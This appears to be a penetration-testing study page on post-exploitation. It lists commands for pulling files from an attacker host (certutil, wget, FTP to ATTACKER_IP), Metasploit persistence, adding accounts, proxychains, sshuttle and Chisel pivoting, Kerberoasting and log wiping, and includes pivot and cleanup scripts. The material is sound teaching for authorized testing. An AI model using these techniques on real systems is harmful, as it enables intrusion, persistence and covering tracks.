23. Post Exploitation.md

File metadata and controls

118 lines (67 loc) · 3.31 KB

Post Exploitation

File Transfers Review

Certutil

certutil.exe -urlcache -f http://IP_ADDRESS/FILE.txt FILE.txt

HTTP

python -m http.server 80

Browser

Navigate directly to file

FTP

  • Start an FTP server on the attacker's machine (pyftpdlib takes the port with -p; add -w if the target must be able to upload): python3 -m pyftpdlib -p 21 -w
  • Connect to the FTP server from the target machine: ftp ATTACKER_IP (log in as anonymous; use binary mode before transferring executables)

Linux

wget http://IP_ADDRESS/FILE.txt

Metasploit

Upload / Download feature

upload local_file remote_path
download remote_file local_path

Maintaining Access Overview

Persistence Scripts

run persistence -h

exploit/windows/local/persistence

exploit/windows/local/registry_persistence

Scheduled Tasks

run scheduleme

run schtaskabuse

Add a user

net user USERNAME PASSWORD /add

NOTE: The run ... entries are legacy Meterpreter scripts and the exploit/windows/local/... entries are Metasploit post modules; on current Metasploit prefer the module form, since the scripts are deprecated. net user is a native Windows command, not a module: it needs an administrative session, and the new account appears in the local user list and in the Security event log (event 4720 when account-management auditing is enabled), so record it for cleanup.

Pivoting

Pivoting is a technique used by attackers to move laterally within a network after gaining initial access. The goal is to explore and compromise additional systems by leveraging the initial foothold.

ProxyChains

One common tool for pivoting is proxychains. It does not spoof IP addresses: it hooks the TCP connect() calls of a dynamically linked program (via LD_PRELOAD) and redirects them through one or more SOCKS or HTTP proxies, so a tool on the attacker's machine appears to connect from the pivot host. Raw sockets, ICMP and UDP are not proxied, which matters for nmap (see the examples below).

To use proxychains, start by editing the configuration file at /etc/proxychains.conf (proxychains-ng, the proxychains4 binary on most current distributions, reads /etc/proxychains4.conf and also accepts -f <file>).

Scroll down to [ProxyList], where you can add proxy addresses with their corresponding ports, for example socks5 127.0.0.1 1080 to match the dynamic forward opened in the next step.

SSH with ProxyChains

Any account that can SSH to the pivot host can open the tunnel; root is not required. To establish the SOCKS listener over SSH:

ssh -f -N -D <PORT> -i <ssh-key> <user>@<IP-Address>

  • f: Sends SSH to the background just before command execution, avoiding an open terminal session.
  • N: Instructs SSH not to execute a remote command, useful for port forwarding.
  • D [bind_address:]port: Specifies a local "dynamic" application-level port forwarding, allowing connections to be forwarded over the secure channel.

Once executed, the connection is established in the background, and traffic can be proxied through this connection to access the network.

Examples of Usage

  • Nmap Scans: proxychains nmap -sT -Pn <Targets> (a full TCP connect scan with host discovery disabled; SYN scans and ICMP pings do not go through the proxy and return misleading results)
  • Kerberoasting Attack: proxychains GetUserSPNs.py <DOMAIN NAME>/user:pass -dc-ip <DC-IP> -request
  • RDP Access: proxychains xfreerdp /u:administrator /p:'Hacker321!' /v:10.10.10.10
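The whole SSH-plus-proxychains pivot, as an added example that is not part of the original notes: it opens the dynamic forward, generates a matching proxychains configuration, checks that the SOCKS port is actually listening before relying on it, and runs the connect scan through it. The pivot host 10.10.10.10, the account pivotuser with private key ./pivot, local port 1080 and the internal subnet 172.16.1.0/24 are assumed values; adjust them for the engagement.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes). Assumed: pivot host 10.10.10.10
# reachable over SSH as pivotuser with key ./pivot, local SOCKS port 1080,
# internal network 172.16.1.0/24 behind the pivot, proxychains-ng and nmap
# installed on the attacker box.
set -eu

# Print a proxychains configuration that sends everything through the SOCKS5
# listener opened by "ssh -D". proxy_dns resolves names through the tunnel so
# lookups for internal hosts do not leak to the attacker's own resolver; the
# [ProxyList] entry must use the same port as -D.
make_proxychains_conf() {
    port="$1"
    cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 ${port}
EOF
}

# Open the dynamic forward in the background. Binding explicitly to 127.0.0.1
# keeps the SOCKS port off the attacker's external interfaces, and
# ExitOnForwardFailure makes ssh fail loudly if the port is already in use.
start_socks_pivot() {
    port="$1"; key="$2"; target="$3"
    ssh -f -N -D "127.0.0.1:${port}" -i "$key" \
        -o ExitOnForwardFailure=yes "$target"
}

# Succeed only once something is listening on the SOCKS port.
socks_listening() {
    ss -ltn "sport = :$1" | grep -q LISTEN
}

# proxychains only hooks TCP connect() in dynamically linked programs, so nmap
# has to use a full connect scan (-sT) and skip ICMP host discovery (-Pn);
# -n avoids reverse lookups that would otherwise be sent one by one.
pivot_nmap() {
    conf="$1"; subnet="$2"
    proxychains4 -q -f "$conf" nmap -sT -Pn -n --top-ports 100 "$subnet"
}

# Usage: ./pivot.sh run
if [ "${1:-}" = "run" ]; then
    conf=$(mktemp)
    make_proxychains_conf 1080 > "$conf"
    start_socks_pivot 1080 ./pivot pivotuser@10.10.10.10
    socks_listening 1080 || { echo "SOCKS listener did not come up" >&2; exit 1; }
    pivot_nmap "$conf" 172.16.1.0/24
fi
```

Writing the configuration to a temporary file and passing it with -f leaves /etc/proxychains.conf untouched, which is useful when several pivots are open at once; the listening check catches the common failure where ssh authenticates but the forward is refused.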

SSHuttle

sshuttle builds a transparent VPN-like tunnel over an SSH connection to the pivot host: it installs local firewall rules (so it needs sudo on the attacker's machine and Python on the pivot) that route all traffic for the listed subnets through the SSH session, so ordinary tools reach the internal network without prepending proxychains to each command. Unlike proxychains it also carries DNS (with --dns) and works with statically linked binaries, but raw-socket scans still do not traverse it.

Example:

sshuttle -r <user>@<IP-Address> 10.10.10.0/24 --ssh-cmd "ssh -i pivot"

Chisel

There's also Chisel, a single-binary Go tool that tunnels TCP over HTTP and is the usual fallback when the pivot has no SSH server: the server side runs on the attacker's machine with --reverse, the client on the pivot connects back and requests a reverse SOCKS listener (R:socks), and that local SOCKS port is then used from proxychains exactly like the ssh -D port above. Because the control channel is plain HTTP(S) from the pivot to the attacker, it also passes through egress filtering that blocks outbound SSH.

Cleaning Up

As a Red Team

Your goal, within the rules of engagement, is to emulate an adversary removing traces of the activity from the system and network logs so that it appears as if you were never there:

  • Erase entries from log files that might indicate your presence.
  • Delete any audit trails related to your actions.
  • Remove or clean up command histories, execution traces, and network traffic logs.

Caveat: wiping logs is itself a detectable event (clearing the Windows Security log writes event 1102, clearing other event logs writes event 104, and centrally forwarded logs are already out of reach), so mature red teams prefer to avoid generating artifacts in the first place (in-memory tooling, no new accounts or services) over deleting them afterwards, and only touch logs when the engagement explicitly authorizes it.

As a Pentester

Your objective is to help the client return their environment to its original state before the engagement, which is only achievable if every change was recorded when it was made:

  • Remove all executables, scripts, and files that were introduced during testing (keep a list of paths and hosts as you drop them).
  • Eliminate any malware, rootkits, or additional user accounts created during the test, including scheduled tasks, services and registry run keys added for persistence.
  • Revert system settings and configurations to their original state.
  • Verify each removal (the file is gone, the account no longer exists, the task is unregistered) and hand the client the list of what was changed and what could not be reverted, so they can finish the cleanup themselves.
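A ledger-driven cleanup, as an added example that is not part of the original notes: every artifact is recorded at the moment it is created, the cleanup plan is generated from that record for the client to review, and the local file removals are verified rather than assumed. The ledger path, the entry types (file, user, task) and the Linux removal commands are assumptions; Windows artifacts (net user /delete, schtasks /delete) follow the same pattern with different commands.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes). Assumed: a plain-text ledger at
# $LEDGER with one "type|value|host" line per artifact; only file, user and
# task artifacts on Linux hosts are handled here.
set -eu

LEDGER="${LEDGER:-./engagement-artifacts.txt}"

# Record an artifact when it is created (file dropped, account added, task
# registered). The host defaults to the machine the script runs on.
track_artifact() {
    type="$1"; value="$2"; host="${3:-localhost}"
    printf '%s|%s|%s\n' "$type" "$value" "$host" >> "$LEDGER"
}

# Emit the removal command for one ledger entry. Unknown types are flagged
# instead of silently skipped so nothing is forgotten in the client report.
removal_command() {
    type="$1"; value="$2"
    case "$type" in
        file) printf 'rm -f -- %s\n' "$value" ;;
        user) printf 'userdel -r -- %s\n' "$value" ;;
        task) printf 'crontab -l | grep -vF -- %s | crontab -\n' "$value" ;;
        *)    printf '# unknown artifact type %s for %s\n' "$type" "$value" ;;
    esac
}

# Print the full cleanup plan, one command per line prefixed with the host it
# must run on, for review before anything is executed.
cleanup_plan() {
    while IFS='|' read -r type value host; do
        [ -n "$type" ] || continue
        printf '[%s] ' "$host"
        removal_command "$type" "$value"
    done < "$LEDGER"
}

# Remove the file artifacts recorded for this host and verify each one is
# actually gone; returns non-zero if anything survives so the failure is seen.
cleanup_files_local() {
    status=0
    while IFS='|' read -r type value host; do
        [ "$type" = file ] && [ "$host" = localhost ] || continue
        rm -f -- "$value"
        if [ -e "$value" ]; then
            echo "still present: $value" >&2
            status=1
        fi
    done < "$LEDGER"
    return $status
}
```

Keeping the plan generation separate from the execution lets the client see exactly what will be touched on which host, and the verification step turns "we deleted it" into a checkable statement for the report.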